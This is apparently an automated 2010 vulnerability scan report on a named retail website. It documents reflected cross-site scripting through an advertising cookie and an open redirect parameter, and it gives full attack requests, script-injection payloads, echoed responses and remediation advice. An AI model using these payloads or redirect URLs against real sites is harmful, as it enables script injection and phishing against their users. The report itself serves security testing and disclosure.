<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... pageName="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="Search Listing: Internal: " var s_prop3="SBPTPAHP1SHTB3E7F7</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>6C9E3006551" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-seasonal/starbucks-seasonal.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a2e9</script><script>alert(1)</script>f07738979de was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-via HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6a2e9</script><script>alert(1)</script>f07738979de;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 32239 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:29 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... eName="Starbucks VIA Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks VIA Page" var s_prop3="SBPTPAHP1SHTB6A2E9</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F07738979DE" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-via/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4fa1</script><script>alert(1)</script>297d9261d7d was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tea HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBf4fa1</script><script>alert(1)</script>297d9261d7d;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 26007 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:58 GMT Connection: close
<head> <title>Tea at Starbucks Store</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> ...[SNIP]... ageName="Tazo Tea HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Tazo Tea HomePage" var s_prop3="SBPTPAHP1SHTBF4FA1</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>297D9261D7D" var s_prop4="" var s_prop5="" var s_prop6="/tea/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state= ...[SNIP]...
The value of the Redir request parameter is used to perform an HTTP redirect. The payload http%3a//a249f6ddae8196a18/a%3f/products/shprodli.asp%3fDeptNo%3d8100%26ClassNo%3d8100%26SubClassNo%3d8750 was submitted in the Redir parameter. This caused a redirection to the following URL:
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:
Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:
The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
Request
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=http%3a//a249f6ddae8196a18/a%3f/products/shprodli.asp%3fDeptNo%3d8100%26ClassNo%3d8100%26SubClassNo%3d8750 HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 360 Content-Type: text/html Location: http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750&CCAID=SBPTPAHP1SHCO&Redir=http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750 Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHCO; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:30:30 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750 ...[SNIP]...
Report generated by Hoyt LLC at Tue Nov 16 13:25:22 CST 2010.